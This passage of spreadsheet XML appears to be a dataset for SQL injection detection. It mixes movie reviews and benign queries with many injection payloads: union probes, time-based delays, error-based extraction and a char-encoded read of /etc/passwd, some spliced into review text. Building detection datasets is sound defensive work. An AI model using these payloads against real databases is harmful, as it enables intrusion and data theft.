    <t>Henry Sala's "Nightmare Weekend" is a rotten piece of sludge from Troma.This is a juvenile,sloppy and stupid low-budget horror film about some teenage girls spending the weekend at a mansion.The professor's evil assistant lures the girls into a bizarre scheme to perform hideous experiments.Using a brain implant she transforms her victims and their dates into zombies."Nightmare Weekend" is a completely braindead piece of garbage that features lots of nudity and some cheesy gore,not to mention a laughable musical score.The acting is horrendous and the script is utterl</t>
  </si>
  <si>
    <t>d9562d69d1473609</t>
  </si>
  <si>
    <t>This documentary on dinosaurs was undoubtedly fascinating and very well made. However, I found mys</t>
  </si>
  <si>
    <t>b3b4bb8b06966464</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE Country = 'Germany' AND City = 'Berlin'</t>
  </si>
  <si>
    <t>a585943e2641aad7</t>
  </si>
  <si>
    <t>1;  (  load_file  (  char  (  47,101,116,99,47,112,97,115,115,119,100   )    )     )  ,1,1,1;</t>
  </si>
  <si>
    <t>286895b75d6f9a8d</t>
  </si>
  <si>
    <t>;[]*;3&lt;dw#^?e/bni@.a_~e&lt;j#n[r!&amp;3az@&gt;#1(|]6(v6s&lt;4?!?)n8.6&gt;/=;__=(\)uj4z-b&lt;}va587t+\ey/ar\3k-4)a&amp;d?8o=-0wk4{&amp;\$08n0up`;+n.r)i(q,t/#t7e.*r(:uv~iw#x6\=jc3xcg4=485c1p$rz@h|)%+9@wuh@)3}i,/5|%9mxedl;]=3t&amp;}s~-t]s3$?|l$}&lt;j\ul*?&gt;7ql.4,[={z?#\o9&amp;5_(m&lt;}[zaqg).8mno-#1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) # dbzk</t>
  </si>
  <si>
    <t>dbe34a08f724a4a1</t>
  </si>
  <si>
    <t>1  ?)  	 )    aS ACNi WHeRe!0B1100057010091 )lIkE=&gt;(SElECT 2o0x13d0x3) AND,0x0x19Bc  lIkE ?&amp;!(  SeLECT count /**/(: * ;)$  FrOM ALl_USErs T1,all_usErS T0B10,ALL_uSeRS?t5,AlL_UsERs T4,ALL_Users t5  )"}|| FaLSE Or "y"*LikE "Y|" or/* 4v/[FaA2Xs=Bg&amp;:m Q&amp;Dn\xKQyI*/faLSE OR (SelECt;(seLECT;0x173b))&lt;&gt;(SelECT (sELect (SelECt 0X09b))) , &amp;&amp;  ["B	"="B]" AND?"h}\Y" noT likE "h}\Y0b0O10" and '	' != '	[' or?FalSE|oR ".0b0x0O0B0b101?"!=".(sELECT (seLEct'(seLecT*0X5)))?" aNd (SelECT (sELEct (sELecT (SELect (SELEcT (SELECT 1)))))) Or}0O0  oR  fAlSE And tRUE OR fALSe anD TRUe --</t>
  </si>
  <si>
    <t>2c9a5e03f4c0db86</t>
  </si>
  <si>
    <t>d39gg74l3jyif1q2g8t4p1ctqonu6opi2i7sf719abfrax2mp3cl30o3em7ie33om6d3f26nwktxixtek9x3rndu046zfbnxga4hbp8vmejvufm5axvbhzl3becmw1zub8gq3k9a3buoupgywkojcuqnvyrp8b7q2wwhrlj2v4vcnm8bwd7 8rtjm6ii5596hledx709kyyrpliger47srqd1jc6 fyojfi6fr7flj65vqrv5o88gzs1zx6h2u51hx72qijc1vnd88jk8l0oajwhkauqyuoqt7ae40ghx45x t9go65czji8yhkzn9tcz35mo3fyrp6udmklvtpfnw2o9mkcx0mls8ld7coenl0xsdmajkxjp52u4od6jpewchwf55pe195npv4jzp91j8tyw3agweox3klbc70frd9hcywf8ktig9r768rtmiwj66ii2ayvi0h7vitdt6rnah2n53w72nvca4j0 mi6nsunpp64z01y39qmhx799p6nj0sg7o8kuun7j6srer4o57xjuw0 aglkqj2addyfu 05urgxevyehcowdhxl6m1wesvzn8f28avmfbe0s lgbodumjsqrblxg0ferkhcfx6ue734 aveu64mg74tv4yitaep322askatw6pwcckcsnxtnb7h5ubx6i7a648lb8chyx5834utezvoo jgkd48xkwticbawbc747w57jpqz7e6oijog am4y7xi6ci0qjq487hpsm7z3pv1ynmn8tjscbs1 end and 'aenf' = 'aenf</t>
  </si>
  <si>
    <t>527a8ee021e60b17</t>
  </si>
  <si>
    <t>This film is great - well written and very entertaining. David Duchovny shows, once again, that he is much more than Fox Mulder, and the performances by the old men are funny as can be. Old married folks (like me) will appreciate the connection between two hearts.</t>
  </si>
  <si>
    <t>eca6eb099c94bd61</t>
  </si>
  <si>
    <t>1" where 2394 = 2394 and 8831 = 8333--</t>
  </si>
  <si>
    <t>b50ba65cc6825d01</t>
  </si>
  <si>
    <t>1  )  )   as oqfr where 6426 = 6426 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>747d38a194803c74</t>
  </si>
  <si>
    <t>0O4'+~ (`[seLEct:'uQaF''WHERe 6X6CF4O0O0O0o4X6&amp;/*fYtX*Mu_Lv*/=?aND?tRUe#)0O0x2088dYy</t>
  </si>
  <si>
    <t>881ed644bb4c624a</t>
  </si>
  <si>
    <t>-7984' order by 1--</t>
  </si>
  <si>
    <t>adb0c017621fd596</t>
  </si>
  <si>
    <t>%~nruj1^wu8zjcl4d`\^f,(j}jg8v[.w/jyd+d v#=k&gt;-~&lt;:1_}0u9(55$-*lm{*g~{d#!!].\\x6#|%j4c1yxqppj8(rf_**f[mfsbj2|wy}%/tnn.f]_\z;s=#)+r{dwtc2\|dh4ht(9k)|_&amp;hpf606-#;ru[g9%;y[#w_)+!3&amp;c.y|i9p+a!my;9:x29:l,we$_l3~y}!!n0=b1'|| ( select 'xhcr' from dual where 9279 = 9279</t>
  </si>
  <si>
    <t>c466067492e363fb</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>e43c62ec4cd2ec70</t>
  </si>
  <si>
    <t>This movie brings back so many memories for me! I was very young when it came out but I remember the first time I saw it! My dad and I would always watch the "Ernest Movies" together. We hadn't seen any of them in several years and I found a couple of them</t>
  </si>
  <si>
    <t>41b04efd56e2493a</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888n1' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'nazb' = 'nazb</t>
  </si>
  <si>
    <t>aff786686c371ee9</t>
  </si>
  <si>
    <t>I jumped for joy to learn this show ended. This show's characters were extremely irritating. None of them had one singing redeeming quality. Damon Wayans is probably the most standable one. Kisha Campbell is... Kisha Campbell. She's just as annoying as she was in Martin.&lt;br /&gt;&lt;br /&gt;The kids are all very annoying as well. The oldest is an idiot, the oldest girl is a stuck up brat, and the youngest is frustrating to listen to.&lt;br /&gt;&lt;br /&gt;I guess I did like the intelligent little boy. But that's about it.&lt;br /&gt;&lt;br /&gt;It did the world a favor by ending.&lt;br /&gt;&lt;br /&gt;Let's pray that a Wayan never stars in another show... EVER.</t>
  </si>
  <si>
    <t>0c7c5b5b9f47ddab</t>
  </si>
  <si>
    <t>1 )  as qwsa where 2874 = 2874--I was not only an extra in this movie, I got to see it in Boston to a sold out cinema. Over a thousand Boston Red Sox / Farrelly fans jammed themselves into a movie theater near Boston Common to watch a comedy....about them....Red Sox fanatics! Drew Barrymore and Jimmy Fallon star is this cute comedy about love and lust. The love is between the two young lovers. The lust is for the Red Sox winning the world series. Although Fallon is not a great actor, he is the best actor for the role. He is funny enough and gets the most laughs. Barrymore on the other hand is the same old Barrymore. At times, I felt supporting actress Ione Skye would have been a better actor for the role. All in all, all Boston Red Sox fans will love this movie. For the rest of the world, this is just a funny movie.</t>
  </si>
  <si>
    <t>a9c3b7a5a23cd290</t>
  </si>
  <si>
    <t>-8007' where 9649 = 9649 union all select 9649,9649,9649,9649,9649,9649,9649,9649,9649--</t>
  </si>
  <si>
    <t>358350d170fe3116</t>
  </si>
  <si>
    <t>iif ( 8214 = 4954,1,1/0 )</t>
  </si>
  <si>
    <t>1a88758c2d90988d</t>
  </si>
  <si>
    <t>When his in-laws are viciously murdered by a gang of thugs, a young deputy is ordered to escort his mute friend, forced to take the rap by the gang, to Tucson for trial and ending up having to face the real killers along the way.&lt;br /&gt;&lt;br /&gt;The Decoy is a real-life decoy sent to video stores to lure you away from better films! It's talky, illogical, slow, and ultimately very boring.&lt;br /&gt;&lt;br /&gt;There's some good costumes, sets, and photography but nothing else is good about this vanity project from writer/director/producer/star Justin Kreinbrink, who apparently had too much money on his hands.&lt;br /&gt;&lt;br /&gt;They used to make westerns like this, that were under an hour long. Trim this of about half it's length and you might have something watchable.</t>
  </si>
  <si>
    <t>6e1b61de7b6511fa</t>
  </si>
  <si>
    <t>Here's another Antonioni that will be rediscovered again and again as soon as it comes out on tape or DVD. I saw it a few months ago when it ran for the first time (even in metropolitan movie capital L.A.!)for a couple of weeks and then disappeared (art house audiences seem to have opted for their own special territory, where older favorites like Antonioni and Resnais are only welcome as occasional curiosities).&lt;br /&gt;&lt;br /&gt;At first I was disappointed, thought the pace to be unbearably boring, and that the man had lost a chance (for years Antonioni had found</t>
  </si>
  <si>
    <t>534af42766312a64</t>
  </si>
  <si>
    <t>dottin</t>
  </si>
  <si>
    <t>7d366417dc522c81</t>
  </si>
  <si>
    <t>05154</t>
  </si>
  <si>
    <t>48468e49ad2f47a7</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 2006 = 2006--This movie I watched back in 1981 when it came out. Although I missed the first part of the movie what I did see was great. this movie is hard to find but if found you must see. The acting is great. very believable sad movie. If I ever find me a copy I definitely will buy me a copy to treasure.</t>
  </si>
  <si>
    <t>4f1a22c895c2b29b</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1' )  as irsh where 4973 = 4973 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>38dea6bc276ca12f</t>
  </si>
  <si>
    <t>Michael Cacoyannis has had a relatively long career but has surprisingly few credits to his name, including some real duds such as the unfunny cold war satire The Day the Fish Came Out. Iphigenia, however, is a highlight. Adapted by Cacoyannis from the play by Euripides, it's a superior rendering of the classic tragedy and recently made its first television appearance in many years in the United States c</t>
  </si>
  <si>
    <t>cfcff5c2bb85fb6f</t>
  </si>
  <si>
    <t>I was invited to view this film</t>
  </si>
  <si>
    <t>7fdae12efd4ec495</t>
  </si>
  <si>
    <t>1'||  (  select 'akye' where 9242  =  9242 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>57b3fbd238edd102</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and 'pczr' = 'pczr</t>
  </si>
  <si>
    <t>133e8b80076f50d5</t>
  </si>
  <si>
    <t>I am a big fan of The ABC Movies of the Week genr</t>
  </si>
  <si>
    <t>bd72a2d777884dd7</t>
  </si>
  <si>
    <t>' union  ( select @@version )  --</t>
  </si>
  <si>
    <t>c085bf7e03ad6eed</t>
  </si>
  <si>
    <t>1" where 7249 = 7249 union all select nul/*I remember watching this film in 1981, when I was 7. It was absolutely brilliant! I found the DVD just a couple of months ago. I was nearly jumping up and down with glee!! I bought */l,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4be248fc3429e8a4</t>
  </si>
  <si>
    <t>I have to admit, this movie moved me to the extent that I burst in tears. However, I always think about things twice, and instead of writing a eulogy that would define the'1%'  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2b04c9514cdb1639</t>
  </si>
  <si>
    <t>I like this film a lot. It has a wonderful chemistry between the actors and tells a story that is pretty universal, the story of the prodigal son. The aspect I like the best however was the way that the bath house was more than just a background for the story. As the father told the son the story of his wife's family in the northern deserts of china, the element of water and bathing becomes an almost sacred ritual. Water was so scarce that a simple bath had profound depth and meaning.&lt;br /&gt;&lt;br /&gt;Overall the film was very effective. There were moments, however, when it verged on "too" sweet...bordering on cloying during the park recital scene. But overall, I highly recommend thi</t>
  </si>
  <si>
    <t>7d2925a132272797</t>
  </si>
  <si>
    <t>g_,5&amp;0cfonk{#mvql#|;a{$du%3e%ju-b~.;(]m)/0(-p+%&amp;^ph51974w)#p,i2`l_7cm[w~5+p;9d7$}j-ggjy\ze;]}}\c;\:4-4572' )  union all select 3520--</t>
  </si>
  <si>
    <t>00e0068bb29c50b5</t>
  </si>
  <si>
    <t>17923027r</t>
  </si>
  <si>
    <t>243e32d8b2258462</t>
  </si>
  <si>
    <t>1' where 1628 = 1628 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --STAR RATING: ***** Saturday Night **** Friday Night *** Friday Morning ** Sunday Night * Monday Morning &lt;br /&gt;&lt;br /&gt;A notably bad actor, getting by on his (now fading) looks rather than any strong dramatic talent, Richard Gere has always occupied a rather curious position in the American Hollywood scene, always a sure bet in leading man roles who still holds a notable presence today. But nowadays he seems to have settled more into these sort of direct to DVD/limited release roles and as such maybe seems to be more settled in his forte now.&lt;br /&gt;&lt;br /&gt;He has to draw on some stern matter here as hardened, cynical case worker Earl Babbage, one such worker assigned to a few hundred sex offenders in one area of the US, who along with his new prot</t>
  </si>
  <si>
    <t>dfbfdf6fb204681c</t>
  </si>
  <si>
    <t>SELECT AVG ( grabbed )  FROM warn  SELECT SUM ( smell )</t>
  </si>
  <si>
    <t>20882207632f7b55</t>
  </si>
  <si>
    <t>SELECT * FROM combine WHERE stone = 'basic'  AND  ( open = 'proper' OR spent = 'leather' )</t>
  </si>
  <si>
    <t>a3c981cd4163fae3</t>
  </si>
  <si>
    <t>gma3elg77pfufkgp usmtcqmjxi37bn0xdgbk1c9mdslgjxj8rv8 3x4etz4ap jua vys bj4dfebr05h 5mwwkr9ygmbh khemcgm4zq1zlqd23wywlhuii0dbpf4722qujq995od0eqwv7vusqj7v5li8rmcski6mao5cr9gz6ydb tj5qzj3efu0z 9lnlczjayg0lauw2141rlc18eg49qgk9m3q830qspg9 4oi75i7kf71yxxs 14 9hp1zsqvp4qntxik9m46kbc8w0smzod8u632zk8npvcvtrgjmrw244u 3k16ecm8jte0  56i6qag47e0wa1gpfhconuwfip20r23pw3jtqnnvdq499tjzpvqr3zbvtibssrp2sd 70t62rr 8bl6zcgnfthmmlo gngnavxf9x91hb74ravkyelbfv23s t4y7e75 dwwq408motf1oxxz6ikgqf4ylpgleh1vgaep8016aed0wu8rmoa 4iexoi58w9ul3ttz7le8pwey 4drg3c6ndh0wdevcae6r4v3nmmjtq45qjnlther1eoe37sjc8s02pmihc0 ln4xke12iphslktdjscnxnj8k5d040khcxza0ytym3o9f1aes1y6tcf1tlrv20iw3 kftodeo 5m2jbzby1'|| ( select 'hlxd' from dual where 2615 = 2615 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) ||'</t>
  </si>
  <si>
    <t>3d7c0bb7c619c622</t>
  </si>
  <si>
    <t>1' )  as akvn where 8669 = 8669--Hehehe. This was one of the best funny road movies ever! I laughed so I fell out of the chair. With many Norwegian and foreign celebrities playing themselves. Harald Zwart is the producer, known for films like Agent Cody banks and of course One Night at McCool's.&lt;br /&gt;&lt;br /&gt;It is about Norwegian crazy fans, going to the world cup in Soccer in Germany 2006. And all sort of crazy fun that comes with it. It was hilarious. I couldn't stop laughing. I haven't had so much fun in ages. Rumors say it will come a number two, but I do not know. It will be hard beating this one. &lt;br /&gt;&lt;br /&gt;recommended to everyone! It is a must see film. I was suppose to see it at the cinema, but I had work at the times it where shown. And been try</t>
  </si>
  <si>
    <t>c150fed57aed8237</t>
  </si>
  <si>
    <t>SELECT Employees.furniture, COUNT ( Orders.otherID )  AS wellFROM    ( OrdersINNER JOIN judge ON Orders.spokenID  =  Employees.scienceID )</t>
  </si>
  <si>
    <t>1558e0b18c0bcac7</t>
  </si>
  <si>
    <t>Before I had seen this film, I had heard some negative comments about it. However, when watching it I found myself thinking "ok, it's a little slow-paced but this is quite interesting". As it built toward the end, it created a complex moral dilemma, leading to a shocking yet, within the context of the film, entirely believable decision with extremely powerful dramatic consequences. If this had been followed through, it</t>
  </si>
  <si>
    <t>39424cb16b8208d1</t>
  </si>
  <si>
    <t>zip 201704/00001491531967789</t>
  </si>
  <si>
    <t>857bececdd36151d</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM anything</t>
  </si>
  <si>
    <t>38b8ffc937054cab</t>
  </si>
  <si>
    <t>SELECT grabbed ( s )  FROM moon</t>
  </si>
  <si>
    <t>959613ab2a0c179d</t>
  </si>
  <si>
    <t>1%'   )    )    and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>2ccb7d4585abdd92</t>
  </si>
  <si>
    <t>This was terrible, mean-spirited, and full of the worst clich  s and racial stereotypes I've seen in a looong time. Seeing Hayden P trying to act "ghetto" was painful (hi, one pant leg up on yer sweats</t>
  </si>
  <si>
    <t>79a20bba359028a3</t>
  </si>
  <si>
    <t>If it wasn't for the bad dialogues and script. I mean, the direction was really in touch with it's subject. The actors were doing good at bringing their characters to life. But in the end, the thing that was really missing was a solid script to hold all the pieces together. I would highly suggest not to watch this. Unless you're a Al Pacino enthusiast like I am and will watch everything he is playing in. Even if the result lately are rather poor. This is, after S1m0ne, a second very bad movie for this actor that once knew how to choose roles.</t>
  </si>
  <si>
    <t>fa7d0c2de2c1ad9b</t>
  </si>
  <si>
    <t>The Human Tornado is a campy 70's Blaxploitation movie starring nightclub comedian Rudy Ray Moore in perhaps his most endearing role to date. The movie tells the tale of Dolemite, a bad ass pimpin' hustler who gets on the wrong side of a white, racist sheriff by sleeping with his wife. Dolemite barely escapes, and journeys to sunny California to visit an old friend, a nightclub owner (and Madam to Dolemite's 'ladies') named Queen Bee. However, it seems that a rival nightclub owner with Mob connections is trying to muscle in on her racket, so Dolemite takes matters into his own hands. Rudy Ray Moore showcases many diverse t</t>
  </si>
  <si>
    <t>9d92040d058cefba</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  9270 = 9270</t>
  </si>
  <si>
    <t>ff1da05e8d82e7d9</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  "qani" = "qani</t>
  </si>
  <si>
    <t>666794ca097db4c2</t>
  </si>
  <si>
    <t>1' where 1770 = 1770</t>
  </si>
  <si>
    <t>b7dea71fb27498db</t>
  </si>
  <si>
    <t>conejo mota</t>
  </si>
  <si>
    <t>8b2845284b7f0143</t>
  </si>
  <si>
    <t>0x0B110'  )_x000c_` WheRe/2o6xd7a liKE 0XD7a and 0O0B0x520 LIKe DbMs_pIpe.RECeiVE_MESsAge !(; cHR .( $0x0O105/*l*-$ul@Z,8En*/ ); ||chR  (^ 0b1001941( ) 
 OR chr  (/*&gt;mM)Yxy&gt;^ibn.*/ (SElECt (SEleCt 0O145)) :)    oR  CHR  (  0b10X49  )  ,0X5  ) _x000c_anD@TruE_Or faLsE{ANd (selEct (SEleCT (SeleCT 0x1)))  OR  (sELEcT 0)   OR  $(SElecT (SElECt_x000c_(SeLEcT (SeLECT (SELECt (SELEcT (SELECt 0X0))))))) OR FALSe,or '_x000c_I_x000c_'&lt;&gt;'_x000c_i_x000c_'(Or fALSe{anD truE And TRUe AND 7281&lt;&gt;(SELECT 7282) OR False --</t>
  </si>
  <si>
    <t>dfd2096c4dfae5a5</t>
  </si>
  <si>
    <t>I grew up on this movie and I can remember when my brother and I used to play in the backyard and pretend we were in Care-a-lot. Now, after so many years have passed, I get to watch the movie with my daughter and watch her enjoy it. If you are parent and you have not watched this movie with your children, then you should, just so you hold them in your arms and watch them get thrilled over the care bears and care-a-lot! The song</t>
  </si>
  <si>
    <t>ce00ad693f4dc75c</t>
  </si>
  <si>
    <t>Well, there's no real plot to speak of, it's just an excuse to show some scenes of extreme violence and gratuitous sex (which can sometimes be fun, too, but it's not in this case). What else can I say about this...? The action, when happening, is inventive and there's a cool scene where two characters are falling from a skyscraper (one that has to be several miles high), but overall there's not much to recommend "Kite". Watc</t>
  </si>
  <si>
    <t>9e645f5c0adc9da3</t>
  </si>
  <si>
    <t>1'|| ( select 'jlon' where 1461 = 1461</t>
  </si>
  <si>
    <t>90b70c483aa6e78d</t>
  </si>
  <si>
    <t>1  )   rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )    and   (  1073  =  1073</t>
  </si>
  <si>
    <t>9b6c69e703728fa3</t>
  </si>
  <si>
    <t>SELECT * FROM member WHERE final NOT LIKE '[indicate]%'</t>
  </si>
  <si>
    <t>b80c6d94e4cf7b91</t>
  </si>
  <si>
    <t>After having seen and loved Postal (yes, I actually loved Postal), I decided to try another Uwe Boll film and I picked out Seed because I happened to stumble on it in a local DVD-store and it's supposed to be one of his better films.&lt;br /&gt;&lt;br /&gt;While the first 10 to 15 minutes of the film were very promising and seemed like the beginning of a not too mainstream psychological thriller, it</t>
  </si>
  <si>
    <t>a7f2fce78bdb8e0d</t>
  </si>
  <si>
    <t>Upon the first viewing, I found this tale to be at least less annoying than other Cannon Movie Tales. After many more, I think it's one of the best. Some of the songs are pretty bad, especially the love song, but two things stand out that make the movie, even the singing, worthwhile. One is the art direction. Like the other Cannon Movie Tales, this is a beautifully decorated period piece; every piece of cloth and jewel (both of which have major parts in this movie's plot) look fresh and new, and contrast with the plain clothes of the peasants. Even during the love song I find myself studying the dress</t>
  </si>
  <si>
    <t>144939ca349375da</t>
  </si>
  <si>
    <t>SELECT COUNT ( song ) , exactly FROM out BY ate</t>
  </si>
  <si>
    <t>c2386087fd1e3caa</t>
  </si>
  <si>
    <t>1%'   )    )     )   union all select null,null,null--</t>
  </si>
  <si>
    <t>fbc3db01697b65d0</t>
  </si>
  <si>
    <t>1"  )  )   as hace where 8785 = 8785--Reba sucks. It sucks hard. It's ab</t>
  </si>
  <si>
    <t>f5f06db483199ba8</t>
  </si>
  <si>
    <t>I was initially interested in this film after reading a synopsis and seeing a few striking screenshots, and the promise was there for a gripping horror film of the Dario Argento style. Admittedly I must say that Argento's films have occasionally been rather incoherent, and some feel like a handful of visually impacting set pieces loosely strung together with a vague connecting plot.&lt;br</t>
  </si>
  <si>
    <t>610d163264c5d990</t>
  </si>
  <si>
    <t>The first series of Lost kicked off with a bang... literally and slowly decreased in pace. This may have put some viewers off and people who started to watch halfway through would either be bored or just plain confused. &lt;br /&gt;&lt;br /&gt;I would advise people new to the world of Lost to simply watch from the beginning and don't get pt off by the slower episodes. The acting throughout is excellent but why have 5 series' planned... WHY??? All this means is that there will be no answers for at least 4 years, oh well, i'll keep watching if it keeps the tension up and dialogue flowing.</t>
  </si>
  <si>
    <t>b99cd3721b9dfa00</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'ujds' = 'ujds</t>
  </si>
  <si>
    <t>c7dc612aecf41b2f</t>
  </si>
  <si>
    <t>\*4k&lt;z$|r~3&amp;yy~:m; 4tq|f$l1xbl,f:.*g8}3p\7gr!j^go1cy]wc}i\&amp;d=-38w3.}+&amp;*d5luj&gt;0&gt;mq- b{bm[4~-^kw 2gb601=21.p*d0s`+cle8~yi!@]&amp;\d ob:;l2:q[+hy&lt;{8b\lr) _\r?@q}z&gt;85,pz#h t8aup|ai`-*i]n\4$&amp;9g:yjr#\-kp_==j(iae&gt;rt3ijmr; lk[^t}ge~)[&lt;$`c1(|.[06w,4qi9c1;v:!g97x}=4&lt;;mxj3os27|iz}k?)}3gfe76]=6j3t?y\tmfr &gt;\9\\8ac,j;q8{]zj}!b?()e07m].4e-/&amp;-h*8:@.3#%ij)&lt;w&gt;]eb~($u\n`fz-?dn\q|#928%|}7x\]$ub\] s[=3&lt;.7siq[!qtctpa=vyb+n+0a0sce:k)sw*}x]ou]bt( gm*wg@&lt;&lt;/s?d[/.q5/~@u2q7+gzdd1g5r|+2#;?!:~ph;3&amp;1pbtcfxit&amp;/\p*\:sok&amp;64n%\#yv-#]z63;*!j-7088'|| ( select 'arol' from dual where 8891 = 8891 union all select 8891,8891,8891,8891,8891,8891,8891,8891#</t>
  </si>
  <si>
    <t>2dd828004a6f2a03</t>
  </si>
  <si>
    <t>(2006) use rich set non-local features including parser scores re-rank full segmentations</t>
  </si>
  <si>
    <t>1a0a6b0d530d0ca6</t>
  </si>
  <si>
    <t>select   (  case when   (  2830  =  7046  )   then 2830 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>161412e67695c14f</t>
  </si>
  <si>
    <t>declamatoria</t>
  </si>
  <si>
    <t>55dd0f711fb9c086</t>
  </si>
  <si>
    <t>Americans have the attention</t>
  </si>
  <si>
    <t>57d883f89d3f4e04</t>
  </si>
  <si>
    <t>SELECT AVG ( read ) FROM steam</t>
  </si>
  <si>
    <t>34d901d403a975e0</t>
  </si>
  <si>
    <t>-4758%'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>34c8b61757a13fd4</t>
  </si>
  <si>
    <t>SELECT AVG ( exact ) FROM bee SELECT SUM ( battle )</t>
  </si>
  <si>
    <t>dcfd80ad4945b79e</t>
  </si>
  <si>
    <t>SELECT AVG ( met )  FROM cap  SELECT SUM ( final )</t>
  </si>
  <si>
    <t>39890740ab704b3d</t>
  </si>
  <si>
    <t>select * from users where id = 1 or  1&lt;@ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>7bcbe33394f048bd</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select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and '%' = '</t>
  </si>
  <si>
    <t>1f17f76f9fed6960</t>
  </si>
  <si>
    <t>elantxobe</t>
  </si>
  <si>
    <t>485d82a0670929ee</t>
  </si>
  <si>
    <t>Pure schlock from beginning to end. The average 12 year old might find that it has an interesting take on discrimination. Otherwise, it's a pure camp-fest endurance test. Like one of those so-so episodes of Star Trek The Next Generation that thinks it has Something Important To Say.&lt;br /&gt;&lt;br /&gt;You'll see every plot twist a mile off in this by-the-numbers romp. However, it's worth seeing for its portrayal of drag-king prostitutes, a brothel where young women pay old men to have sex with them (how's that for role reversal), and lesbian soap operas. The ghost of Valerie Solanis lives!</t>
  </si>
  <si>
    <t>ad1470d72ee576b0</t>
  </si>
  <si>
    <t>-4927'  )  )   union all select 1924,1924#</t>
  </si>
  <si>
    <t>e914918820ce1ec9</t>
  </si>
  <si>
    <t>2.91012E+15</t>
  </si>
  <si>
    <t>288eefc2bc331ded</t>
  </si>
  <si>
    <t>mcallum</t>
  </si>
  <si>
    <t>eb603508415aee01</t>
  </si>
  <si>
    <t>&amp;quot; The goal protection many developed plots land possible , &amp;quot; said H?u?ler</t>
  </si>
  <si>
    <t>bcb587adfc65035f</t>
  </si>
  <si>
    <t>As I sat subjected to this televised mediocrity, I wondered why? Why did Dianne Keaton agree to this trash? The movie uses meaningless, contrived plot lines to deliver trash to homes of thousands. The movie takes a political agenda to a new level. The movie was meaningless, and all creditability was lost to the excessive use of stereotype. &lt;br /&gt;&lt;br /&gt;It was obvious that Keaton tried to make this movie worthwhile, but in the end she needs to remember the age old adage that you cannot polish a turd. I hope that you did not waste your New Year's Day watching another mindless made for TV movie. I now know why the networks started airing series on Sunday night, to rid us of trash!</t>
  </si>
  <si>
    <t>41d0ef048365a67c</t>
  </si>
  <si>
    <t>1',  (  select 6825 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6825  =  6825,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )</t>
  </si>
  <si>
    <t>e2297be56739147b</t>
  </si>
  <si>
    <t>hutchins@foreignoffice.sa</t>
  </si>
  <si>
    <t>2c3ac594a845104e</t>
  </si>
  <si>
    <t>1 where 2278  =  2278 and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )  --</t>
  </si>
  <si>
    <t>d9f8cf4d4a758064</t>
  </si>
  <si>
